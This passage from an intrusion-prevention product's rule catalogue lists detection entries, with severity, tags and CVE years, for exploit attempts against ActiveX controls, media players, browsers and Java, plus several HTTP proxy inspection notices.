First detected in: sgpkg-ips-115-2032
Last changed: sgpkg-ips-269-3038
Vulnerability: Visual-Basic-Script-ShellCode-Generation
Description:
Back to top

HTTP_SS-VMware-Com-API-ActiveX-Control-Buffer-Overflow

About this situation: An attempt to exploit a buffer overflow vulnerability in VMware VMware COM API ActiveX detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, EMC VMware GSX Server, EMC VMware ESX Server, CVE2008, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-165-2032
Last changed: sgpkg-ips-325-4219
Vulnerability: VMware-Com-API-ActiveX-Control-Buffer-Overflow
Description:
Back to top

HTTP_SS-VMware-IntraProcessLogging-DLL-ActiveX-File-Overwrite

About this situation: Attempt to exploit a file overwrite vulnerability in VMware
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, EMC VMware, CVE2007, Windows not specific, EMC VMware not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-172-2032
Last changed: sgpkg-ips-325-4219
Vulnerability: VMware-IntraProcessLogging-DLL-ActiveX-File-Overwrite
Description:
Back to top

HTTP_SS-VMware-Remote-Console-HOST-And-MOID-Format-String-Code-Execution

About this situation: An attempt to exploit a code execution vulnerability in VMware Remote Console detected
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, EMC VMware Remote Console, CVE2009, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-314-4219
Last changed: sgpkg-ips-325-4219
Vulnerability: VMware-Remote-Console-HOST-And-MOID-Format-String-Code-Execution
Description:
Back to top

HTTP_SS-VMware-Vielib-ActiveX-CreateProcess-Command-Execution

About this situation: Attempt to exploit a command execution vulnerability in VMware vielib.dll
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, EMC VMware, CVE2007, Windows not specific, EMC VMware not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-172-2032
Last changed: sgpkg-ips-325-4219
Vulnerability: VMware-Vielib-ActiveX-CreateProcess-Command-Execution
Description:
Back to top

HTTP_SS-VMware-Workstation-ActiveX-Control-Vielib.dll-Command-Execution

About this situation: Command execution exploit against VMware Workstation ActiveX Control detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, EMC VMware Workstation, CVE2007, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-115-2032
Last changed: sgpkg-ips-325-4219
Vulnerability: VMware-Workstation-ActiveX-Control-Vielib.dll-Command-Execution
Description:
Back to top

HTTP_SS-VMware-Workstation-ActiveX-Partition-Table-Delete-Exploit

About this situation: Attempt to exploit a partition table deletion exploit on VMWare workstation
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, EMC VMware Workstation, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-172-2032
Last changed: sgpkg-ips-325-4219
Vulnerability: VMware-Workstation-ActiveX-Partition-Table-Delete
Description:
Back to top

HTTP_SS-Vulnerable-Microsoft-Internet-Explorer-Function-Called

About this situation: Vulnerable Microsoft Internet Explorer function called
Context: HTTP Server Stream
Severity: 7
Tags: Windows, x86, Internet Explorer, MS2007-02, CVE2006, Windows not specific, Internet Explorer not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-83-1314
Last changed: sgpkg-ips-148-2032
Vulnerability: HTTP-Microsoft-Internet-Explorer-Adodb.Connection-Execute-Memory-Corruption
Description:
Back to top

HTTP_SS-Watchfire-Appscan-401-Response-Realm-Buffer-Overflow

About this situation: Detects HTTP responses with a large Realm field, which may overflow a buffer in Watchfire Appscan
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Watchfire Appscan, CVE2005, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-53-1210
Last changed: sgpkg-ips-407-4219
Vulnerability: HTTP-Watchfire-Appscan-401-Response-Realm-Buffer-Overflow
Description:
Back to top

HTTP_SS-Webkit-Object-Outline-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Webkit HTML rendering engine
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Safari, Chrome, CVE2010, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-374-4219
Last changed: sgpkg-ips-374-4219
Vulnerability: Webkit-Object-Outline-Memory-Corruption
Description:
Back to top

HTTP_SS-Winamp-Id3v2-Tag-Handling-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in NullSoft Winamp detected
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Winamp, CVE2005, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-355-4219
Last changed: sgpkg-ips-359-4219
Vulnerability: Winamp-Id3v2-Tag-Handling-Buffer-Overflow
Description:
Back to top

HTTP_SS-Winamp-Playlist-Buffer-Overflow

About this situation: Winamp playlist file with a long filename, possible buffer overflow exploit
Context: HTTP Server Stream
Severity: 10
Tags: Windows, x86, Winamp, CVE2006, Windows not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-57-1210
Last changed: sgpkg-ips-342-4219
Vulnerability: Winamp-Playlist-Buffer-Overflow
Description:
Back to top

HTTP_SS-Windows-Media-HTTP-Stream

About this situation: Windows Media HTTP stream detected
Context: HTTP Server Stream
Severity: 1
Tags: Windows, Any Hardware, Windows Media Player, Windows not specific, Streaming Protocols, TCP Server Traffic
First detected in: sgpkg-ips-173-2032
Last changed: sgpkg-ips-173-2032
Vulnerability: Windows-Media-HTTP-Stream-Download
Description:
Back to top

HTTP_SS-Windows-Media-Player-ASF-CVE-2009-2527

About this situation: An exploit against Windows Media Players ASF parser detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Windows Media Player, MS2009-10, CVE2009, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-257-3038
Last changed: sgpkg-ips-257-3038
Vulnerability: Microsoft-Windows-Media-Player-Code-Execution-MS09-052
Description:
Back to top

HTTP_SS-Windows-Media-Player-Remote-Code-Execution-CVE-2010-0818

About this situation: A malicious ASF file targeting CVE-2010-0818 over HTTP detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Windows Media Player, MS2010-09, CVE2010, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-340-4219
Last changed: sgpkg-ips-340-4219
Vulnerability: Windows-Media-Player-Remote-Code-Execution-CVE-2010-0818
Description:
Back to top

HTTP_SS-Windows-Media-Runtime-Heap-Corruption-CVE-2009-2525

About this situation: A malicious ASF file targeting CVE-2009-2525 over HTTP detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Windows Media Format Runtime, Windows Media Player, MS2009-10, CVE2009, Windows not specific, Windows Media Format Runtime not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-257-3038
Last changed: sgpkg-ips-257-3038
Vulnerability: Windows-Media-Runtime-Heap-Corruption-CVE-2009-2525
Description:
Back to top

HTTP_SS-Windows-Media-Runtime-Voice-Sample-Rate-Code-Execution-CVE-2009-0555

About this situation: A malicious ASF file targeting CVE-2009-0555 over HTTP detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Windows Media Format Runtime, Windows Media Player, MS2009-10, CVE2009, Windows not specific, Windows Media Format Runtime not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-257-3038
Last changed: sgpkg-ips-257-3038
Vulnerability: Windows-Media-Runtime-Voice-Sample-Rate-Code-Execution-CVE-2009-0555
Description:
Back to top

HTTP_SS-Windows-Shell-Shortcut-Arbitrary-Code-Execution

About this situation: Attempt to exploit a vulnerability in Microsoft Windows
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, MS2010-08, CVE2010, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-325-4219
Last changed: sgpkg-ips-325-4219
Vulnerability: Windows-Shell-Shortcut-Arbitrary-Code-Execution
Description:
Back to top

HTTP_SS-Windows-Task-Scheduler-Job-File-System-Compromise

About this situation: Buffer overflow attempt against Windows Task Scheduler
Context: HTTP Server Stream
Severity: 7
Tags: Windows, x86, Windows Task Scheduler, MS2004-07, CVE2004, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-370-4219
Last changed: sgpkg-ips-870-5242
Vulnerability: Windows-Task-Scheduler-Job-File-System-Compromise
Description:
Back to top

HTTP_SS-WinZip-CreateNewFolderFromName-ActiveX-Control-Buffer-Overflow

About this situation: Detects buffer overflow exploits against the WinZip FileView ActiveX control
Context: HTTP Server Stream
Severity: 7
Tags: Windows, x86, WinZip, CVE2006, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-161-2032
Last changed: sgpkg-ips-325-4219
Vulnerability: WinZip-CreateNewFolderFromName-ActiveX-Control-Buffer-Overflow
Description:
Back to top

HTTP_SS-WMP-1-CVE-2010-2745

About this situation: An attempt to exploit a vulnerability in Windows Media Player was detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Windows Media Player, MS2010-10, CVE2010, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-346-4219
Last changed: sgpkg-ips-346-4219
Vulnerability: Microsoft-WMP-CVE-2010-2745
Description:
Back to top

HTTP_SS-WMP-2-CVE-2010-2745

About this situation: An attempt to exploit a vulnerability in Windows Media Player was detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Windows Media Player, MS2010-10, CVE2010, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-346-4219
Last changed: sgpkg-ips-346-4219
Vulnerability: Microsoft-WMP-CVE-2010-2745
Description:
Back to top

HTTP_SS-Xpdf-Splash-Drawimage-Integer-Overflow

About this situation: An attempt to exploit a vulnerability in Glyph & Cog Xpdf detected
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Glyph & Cog Xpdf, CVE2009, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-261-3038
Last changed: sgpkg-ips-269-3038
Vulnerability: Xpdf-Splash-Drawimage-Integer-Overflow
Description:
Back to top

HTTP_SS-Xunlei-Thunder-PPlayer-ActiveX-Component-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Xunlei Thunder detected
Context: HTTP Server Stream
Severity: 10
Tags: Windows, Any Hardware, Xunlei Thunder, CVE2007, Windows not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-136-2032
Last changed: sgpkg-ips-325-4219
Vulnerability: Xunlei-Thunder-PPlayer-ActiveX-Component-Buffer-Overflow
Description:
Back to top

HTTP_SS-Xunlei-Thunderbolt-ActiveX-Object-Arbitary-File-Download-And-Execute

About this situation: Attempt to exploit a vulnerability in Web Thunderbolt detected
Context: HTTP Server Stream
Severity: 10
Tags: Windows, x86, Xunlei Thunderbolt, CVE2007, Windows not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-111-2032
Last changed: sgpkg-ips-249-3038
Vulnerability: Xunlei-Thunderbolt-ActiveX-Object-Arbitary-File-Download-And-Execute
Description:
Back to top

HTTP_SS-Xunlei-Thunderbolt-ActiveX-Object-DownURL2-Buffer-Overflow

About this situation: Attempt to exploit a vulnerability in Xunlei Thunderbolt detected
Context: HTTP Server Stream
Severity: 10
Tags: Windows, x86, Xunlei Thunderbolt, CVE2007, Windows not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-133-2032
Last changed: sgpkg-ips-325-4219
Vulnerability: Xunlei-Thunderbolt-ActiveX-Object-DownURL2-Buffer-Overflow
Description:
Back to top

HTTP_SS-Yahoo!-Messenger-CYFT-ActiveX-Control-File-Download

About this situation: Detected a file download attempt with Yahoo! Messenger CYFT object
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Yahoo Messenger, CVE2007, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-133-2032
Last changed: sgpkg-ips-325-4219
Vulnerability: Yahoo!-Messenger-CYFT-ActiveX-Control-File-Download
Description:
Back to top

HTTP_SS-Yahoo!-Messenger-YVerInfo.dll-ActiveX-Control-Multiple-Buffer-Overflows

About this situation: Attempt to exploit a vulnerability in Yahoo! Messenger detected
Context: HTTP Server Stream
Severity: 10
Tags: Windows, x86, Yahoo Messenger, CVE2007, Windows not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-134-2032
Last changed: sgpkg-ips-325-4219
Vulnerability: Yahoo!-Messenger-YVerInfo.dll-ActiveX-Control-Multiple-Buffer-Overflows
Description:
Back to top

HTTP_SS-Yahoo!-Messenger-YWcUpl.WcUpload-ActiveX-Control-Exploit

About this situation: Exploit against the Yahoo! Messenger YWcUpl.WcUpload ActiveX control detected
Context: HTTP Server Stream
Severity: 10
Tags: Windows, Any Hardware, Yahoo Messenger, CVE2007, Windows not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-111-2032
Last changed: sgpkg-ips-325-4219
Vulnerability: Yahoo!-Messenger-Webcam-Upload-ActiveX-Control-Stack-Buffer-Overflow
Description:
Back to top

HTTP_SS-Yahoo!-Messenger-YWcVwr.WcViewer-ActiveX-Control-Exploit

About this situation: Exploit against the Yahoo! Messenger YWcVwr.WcViewer ActiveX control detected
Context: HTTP Server Stream
Severity: 10
Tags: Windows, Any Hardware, Yahoo Messenger, CVE2007, Windows not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-111-2032
Last changed: sgpkg-ips-325-4219
Vulnerability: Yahoo!-Messenger-Webcam-Viewer-ActiveX-Control-Stack-Buffer-Overflow
Description:
Back to top

HTTP_SS-Yahoo!-Music-Jukebox-ActiveX-Control-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Yahoo! Music Jukebox detected
Context: HTTP Server Stream
Severity: 10
Tags: Windows, Any Hardware, Yahoo! Music Jukebox, CVE2008, Windows not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-141-2032
Last changed: sgpkg-ips-1280-5242
Vulnerability: HTTP_Yahoo!-Music-Jukebox-ActiveX-Control-Buffer-Overflow
Description:
Back to top

HTTP_SS-Yahoo!-Widgets-YDP-ActiveX-Control-Buffer-Overflow

About this situation: Buffer overflow exploit against Yahoo! Widgets detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Yahoo! Widgets, CVE2007, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-115-2032
Last changed: sgpkg-ips-325-4219
Vulnerability: Yahoo!-Widgets-YDP-ActiveX-Control-Buffer-Overflow
Description:
Back to top

HTTP_SS-Yahoo-Messenger-ActiveX-Control-Command-Execution

About this situation: An attempt to exploit a code execution vulnerability in Yahoo Messenger WScript.Shell ActiveX control detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Yahoo Messenger, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-325-4219
Last changed: sgpkg-ips-325-4219
Vulnerability: Yahoo-Messenger-ActiveX-Control-Command-Execution
Description:
Back to top

HTTP_SS-Yahoo-Messenger-AudioConf-ActiveX-Control-Buffer-Overflow

About this situation: Buffer overflow exploit against the Yahoo! Messenger AudioConf ActiveX control detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, x86, Yahoo Messenger, CVE2007, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-104-1314
Last changed: sgpkg-ips-342-4219
Vulnerability: HTTP-Yahoo-Messenger-AudioConf-ActiveX-Control-Buffer-Overflow
Description:
Back to top

HTTP_SS-Your-Freedom-Cgi-Response

About this situation: Detected a HTTP response using CGI protocol from Your Freedom network
Context: HTTP Server Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Your Freedom, Any Operating System not specific, Tunneling Protocols, TCP Server Traffic
First detected in: sgpkg-ips-227-3038
Last changed: sgpkg-ips-354-4219
Vulnerability: Your-Freedom-Network-Usage
Description:
Back to top

HTTP_SS-Your-Freedom-Network-Response

About this situation: Detected a HTTP response from Your Freedom network
Context: HTTP Server Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Your Freedom, Any Operating System not specific, Tunneling Protocols, TCP Server Traffic
First detected in: sgpkg-ips-214-2032
Last changed: sgpkg-ips-322-4219
Vulnerability: Your-Freedom-Network-Usage
Description:
Back to top

HTTP_SS-Zenturi-ProgramChecker-sasatl-ActiveX-Control-DebugMsgLog-Method

About this situation: Detected attempt to use vulnerable method of sasatl ActiveX component of Zenturi ProgramChecker
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Zenturi ProgramChecker, CVE2007, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-115-2032
Last changed: sgpkg-ips-325-4219
Vulnerability: Zenturi-ProgramChecker-sasatl-ActiveX-Control-DebugMsgLog-Method
Description:
Back to top

HTTP_SS-Zenturi-ProgramChecker-sasatl-ActiveX-Control-Fill-Method

About this situation: Detected attempt to use vulnerable method of sasatl ActiveX component of Zenturi ProgramChecker
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Zenturi ProgramChecker, CVE2007, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-115-2032
Last changed: sgpkg-ips-325-4219
Vulnerability: Zenturi-ProgramChecker-sasatl-ActiveX-Control-Fill-Method
Description:
Back to top

HTTP_SS-Zenturi-ProgramChecker-sasatl-ActiveX-Control-Scan-Method-BOF

About this situation: Detected attempt to use vulnerable method of sasatl ActiveX component of Zenturi ProgramChecker
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Zenturi ProgramChecker, CVE2007, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-115-2032
Last changed: sgpkg-ips-325-4219
Vulnerability: Zenturi-ProgramChecker-sasatl-ActiveX-Control-Scan-Method-Buffer-Overflow
Description:
Back to top

HTTP_SS-Zip-Archive-Download

About this situation: Detected a download attempt of a zip archive
Context: HTTP Server Stream
Severity: 2
Tags: Any Operating System, Any Hardware, WinZip, Any Operating System not specific, Possibly Unwanted Content, TCP Server Traffic
First detected in: sgpkg-ips-179-2032
Last changed: sgpkg-ips-188-2032
Vulnerability: Zip-Archive
File-Type-Identification
Description:
Back to top

HTTP_SS_Microsoft-Windows-Gdiplus-TIFF-Parsing-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Microsoft Expression Web detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, Microsoft Office, MS2009-10, CVE2009, Windows not specific, Internet Explorer not specific, Microsoft Office not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-409-4219
Last changed: sgpkg-ips-409-4219
Vulnerability: Microsoft-Windows-Gdiplus-TIFF-Parsing-Buffer-Overflow
Description:
Back to top

HTTP_SS_Microsoft-Windows-OpenType-Font-Parsing-Stack-Overflow

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows XP, Windows 2003, Windows Vista, Windows 7, Windows 2008 R2, Windows 2008, Any Hardware, MS2011-04, CVE2011, Windows XP not specific, Windows 2003 not specific, Windows Vista not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-409-4219
Last changed: sgpkg-ips-409-4219
Vulnerability: Microsoft-Windows-OpenType-Font-Parsing-Stack-Overflow
Description:
Back to top

HTTP_SS_Mozilla-Firefox-Object-Mchannel-Use-After-Free

About this situation: An attempt to exploit a vulnerability in Mozilla Foundation Firefox detected
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Mozilla SeaMonkey, Mozilla Firefox, CVE2011, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-409-4219
Last changed: sgpkg-ips-409-4219
Vulnerability: Mozilla-Firefox-Object-Mchannel-Use-After-Free
Description:
Back to top

HTTP_SS_Mozilla-Multiple-Products-Array.reduceright-Integer-Overflow

About this situation: An attempt to exploit a vulnerability in Mozilla Foundation Firefox detected
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Mozilla SeaMonkey, Mozilla Firefox, Mozilla Thunderbird, CVE2011, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-409-4219
Last changed: sgpkg-ips-409-4219
Vulnerability: Mozilla-Multiple-Products-Array.reduceright-Integer-Overflow
Description:
Back to top

HTTP_SS_Trend-Micro-Control-Manager-Cross-Site-Request-Forgery

About this situation: An attempt to exploit a vulnerability in Trend Micro Control Manager detected
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Trend Micro Control Manager, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-409-4219
Last changed: sgpkg-ips-409-4219
Vulnerability: Trend-Micro-Control-Manager-Cross-Site-Request-Forgery
Description:
Back to top

HTTP_Strip-Header

About this situation: Header removed
Context: SSM Context
Severity: 1
Tags: SSM HTTP Proxy, Inspection
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Blocked header removed.
Back to top

HTTP_Stripping

About this situation: Active content removed
Context: SSM Context
Severity: 1
Tags: SSM HTTP Proxy, Inspection
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Response modified by removing Active Content.
Back to top

HTTP_Sun-Java-Plugin-JavaScript-Security-Restriction-Bypass

About this situation: Attempt to exploit a vulnerability in Sun JRE detected
Context: HTTP Server Stream
Severity: 10
Tags: Any Operating System, Any Hardware, Sun Java Runtime Environment, CVE2004, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-108-2032
Last changed: sgpkg-ips-148-2032
Vulnerability: Sun-Java-Plugin-JavaScript-Security-Restriction-Bypass
Description:
Back to top

HTTP_Sun-Java-Runtime-Environment-Classloader-Privilege-Escalation

About this situation: Malicious Java applet detected
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Sun Java Runtime Environment, CVE2002, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-90-1314
Last changed: sgpkg-ips-148-2032
Vulnerability: HTTP-Sun-Java-Runtime-Environment-Classloader-Privilege-Escalation
Description:
Back to top

HTTP_Sun-Microsystems-Java-Gif-File-Handling-Memory-Corruption

About this situation: Attempt to exploit memory corruption vulnerability in Sun JRE detected
Context: HTTP Server Stream
Severity: 10
Tags: Any Operating System, Any Hardware, Sun Java Runtime Environment, CVE2007, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-124-2032
Last changed: sgpkg-ips-148-2032
Vulnerability: Sun-Microsystems-Java-Gif-File-Handling-Memory-Corruption
Description:
Back to top

HTTP_Suspicious-Author-Field-In-Microsoft-OLE-Compound-File

About this situation: Suspicious Author field in Microsoft OLE compound file
Context: HTTP Server Stream
Severity: 7
Tags: Windows 98, Windows 98 SE, Windows ME, Windows 2000 SP3, Windows 2000 SP4, x86, MS2005-05, CVE2005, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-68-1314
Last changed: sgpkg-ips-393-4219
Vulnerability: Microsoft-Windows-Explorer-Web-View-Script-Execution
Description:
Back to top

HTTP_Suspicious-ICC-Profile-In-JPEG-File

About this situation: Suspicious ICC profile in JPEG file. Possible exploit against vulnerability in Microsoft Color Management Module
Context: HTTP Server Stream
Severity: 7
Tags: Windows, x86, MS2005-07, CVE2005, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-64-1210
Last changed: sgpkg-ips-925-5242
Vulnerability: Microsoft-Color-Management-Module-Buffer-Overflow
Description:
Back to top

HTTP_Tentative-HTTP-Application

About this situation: Tentative HTTP Application Detected
Context: ProtoId without parameters
Severity: 1
Tags: Inspection
First detected in: sgpkg-ips-1094-5242
Last changed: sgpkg-ips-1105-5242
Description: After valid HTTP request headers has been processed this situation will be produced for enabling the HTTP application to match prior the HTTP server reply has been inspected. Later when the real HTTP server reply has been inspected the HTTP appication match will be finalized or some other application match will be produced if the server's reply is not HTTP.
Back to top

HTTP_Too-Many-Encodings

About this situation: Unsupported number of stacked encodings in HTTP header
Context: HTTP without parameters
Severity: 1
Tags: Attack Related Anomalies, Anomalies
First detected in: sgpkg-ips-858-5242
Last changed: sgpkg-ips-1531-5242
Description: An unsupported number of content or transfer encodings were encountered in HTTP header. The limit is currently two compression encodings plus possibly a chunked encoding. The message content can't be inspected, this might indicate an evasion attempt.
Back to top

HTTP_Too-Many-Header-chunks

About this situation: SSM HTTP Proxy encountered too many chunk headers.
Context: SSM Context
Severity: 1
Tags: SSM HTTP Proxy, Inspection
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: The HTTP Proxy encountered more chunked headers than can be processed.
Back to top

HTTP_Too-Many-Multipart-headers

About this situation: SSM HTTP Proxy encountered too many multipart headers
Context: SSM Context
Severity: 1
Tags: SSM HTTP Proxy, Inspection
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: The HTTP Proxy encountered more multipart headers than can be processed.
Back to top

HTTP_Transfer-Encoding-Unsupported

About this situation: Unsupported transfer encoding in HTTP header field
Context: HTTP without parameters
Severity: 1
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-858-5242
Last changed: sgpkg-ips-1531-5242
Description: An unsupported/unknown transfer encoding was encountered in HTTP header field. The message content can't be decoded. This might indicate an evasion attempt.
Back to top

